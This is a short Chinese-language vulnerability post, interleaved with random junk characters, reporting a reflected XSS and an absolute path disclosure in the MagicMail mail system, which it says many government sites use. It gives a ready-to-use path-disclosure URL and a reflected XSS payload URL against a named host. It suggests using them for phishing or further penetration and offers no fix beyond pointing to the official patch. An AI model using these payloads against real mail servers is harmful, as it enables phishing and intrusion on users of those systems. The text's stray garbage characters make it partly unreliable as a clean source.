今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞" S; b* ^# U$ {' f
4 Z4 W# m/ r. @2 y* y ' C! p9 w$ K; ~- x) J6 i) E+ x5 _
包含 一个反射性XSS 以及 绝对路径泄漏( A' T, Y1 A+ B' c% x3 d* E
看了看 貌似全部是linux的。$ N, K' M; @$ ^3 t
/ Q% R. K7 `3 ?6 P% l关键字:迈捷邮件系统 by MagicMail
8 |. S/ ^2 p& C; }0 E: D
* L6 {4 a) Q; s, n+ ]可以看到很多政府网站都用这个邮件系统3 q4 l* H% K4 W; }; s7 @2 I6 A
. M3 B" A9 v1 q) e
绝对路径 http://madman.in/index.php?login_type=declare&language=
( k% O% O% @0 j& L8 B9 @3 U$ q1 a* U9 G( x0 [
+ Y7 t) M) Q [6 d
+ i U( U5 F6 ~- |' GXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E% x4 i$ ~! E8 D2 x- H5 u& u1 g& l
! F4 q" l* Z6 s9 A8 P
, z+ v' w. H+ t9 \# d Y2 `
2 t/ b- g" ~; X
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
9 I& ^/ x7 X/ E* ^6 X
v; `+ w( A) `- F% c o修复方案:看官方补丁吧。
3 ^( ]4 l9 x1 L: M2 z0 t/ D$ @- A) Z |